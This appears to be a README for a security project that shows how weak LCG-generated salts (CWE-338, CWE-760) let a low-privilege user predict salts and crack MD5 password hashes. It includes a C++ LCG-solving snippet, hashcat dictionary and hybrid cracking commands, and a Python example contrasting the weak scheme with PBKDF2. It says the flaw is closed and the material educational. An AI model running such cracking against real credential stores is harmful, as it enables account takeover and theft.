Attack on a vulnerability in a developed feature where CWE-338 and CWE-760 can be exploited and unsalted hashes can be obtained to perform a recovery with several strategies.

alexandertoepfer/cwe-shark-h

Salt-Hash Approximation Recovery-attack with Known plaintext using data containers (Hashcat)

⚠️ Disclaimer: PLEASE BE AWARE THAT THE VULNERABILITY HAS BEEN IDENTIFIED AND SUCCESSFULLY CLOSED. NO KNOWN ATTACKS HAVE BEEN EXECUTED USING THIS VULNERABILITY AND NO DATA WAS OBTAINABLE BY THIRD PARTIES. THE INFORMATION PRESENTED IS FOR EDUCATIONAL PURPOSES ONLY AND DOES NOT REPRESENT AN ONGOING RISK.

This is a demonstrative recovery attack with which any low-privilege user of the system can potentially steal user credentials and perform actions under a different identity. It works by exploiting the password reset feature shortly after a finished update cycle, in combination with data containers that let the attacker map possible PRNG sequences to salts for hash predictions. The attack does not set off any data integrity measures; cyber forensics would only notice traces of the attack once the attacker is already using compromised credentials, making it hard, if not impossible, to identify the source.

Summary

  1. Remove nearby hash salts by iterating LCG parameters with known points in the sequence
  2. Fire and forget guessed unsalted hashes based on the LCG sequence via cloud compute services
  3. Copyright

CWE-338 Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)

The product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG's algorithm is not cryptographically strong.

//for d=1
rlcg<a, c, m, /*second modulo*/0> rlcg({p1, p2});
if(!rlcg.solution().empty())
  std::cout << rlcg.solution() << std::endl;

CWE-760 Use of a One-Way Hash with a Predictable Salt

The product uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but uses a predictable salt as part of the input.

hashcat.exe -m 0 ./md5_salt_guess.hash -a 0 -d 1 ./rockyou-extended.dict & hashcat.exe -m 0 ./md5_salt_guess.hash -a 6 -d 1 -1 "!$??" ./rockyou-extended.dict ?1 &^
hashcat.exe -m 0 ./md5_salt_guess.hash -a 6 -d 1 -1 "@#%&*" ./rockyou-extended.dict ?1 & hashcat.exe -m 0 ./md5_salt_guess.hash -a 6 -d 1 -1 "12347890" -2 "!$??" ./rockyou-extended.dict ?1?2 &^
hashcat.exe -m 0 ./md5_salt_guess.hash -a 6 -d 1 -1 "12347890" ./rockyou-extended.dict ?1 & more hashcat.potfile
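
The two weaknesses above, shown beside a hardened form. This is an added example, not code from this repository: the LCG constants, the salt-then-password MD5 layout, the seed, and all function names are assumptions made for illustration. `salts_follow_lcg` is an audit check a defender can run over stored salts to see whether they were drawn from such a generator.

```python
import hashlib
import hmac
import secrets

# Assumed LCG constants (the public "minstd" parameters), for illustration only;
# the page does not state which parameters the affected feature used.
A, C, M = 48271, 0, 2**31 - 1
PBKDF2_ROUNDS = 600_000

def lcg_next(state):
    """One step of the linear congruential generator."""
    return (A * state + C) % M

def weak_record(password, state):
    """CWE-338 + CWE-760: salt is the next LCG output, hash is a single fast MD5.
    The salt-then-password layout is an assumption made for this example."""
    salt = lcg_next(state)
    digest = hashlib.md5(f"{salt}{password}".encode()).hexdigest()
    return salt, digest, salt  # the new state equals the salt just stored

def salts_follow_lcg(salts):
    """Audit check: True when each stored salt is the LCG successor of the one before."""
    return len(salts) > 1 and all(lcg_next(p) == n for p, n in zip(salts, salts[1:]))

def hardened_record(password):
    """Salt from the OS CSPRNG, stretched with PBKDF2-HMAC-SHA256 instead of MD5."""
    salt = secrets.token_bytes(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, key

def verify(password, salt, key):
    """Recompute the derived key and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, key)

if __name__ == "__main__":
    state, salts = 12345, []  # constructed seed
    for pw in ("alpha", "bravo", "charlie"):  # constructed passwords
        salt, _, state = weak_record(pw, state)
        salts.append(salt)
    print("stored salts form an LCG sequence:", salts_follow_lcg(salts))
    salt, key = hardened_record("alpha")
    print("hardened record verifies:", verify("alpha", salt, key))
```
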

Copyright and license

Code and documentation copyright 2021 Alexander Töpfer. Code released under the MIT License.
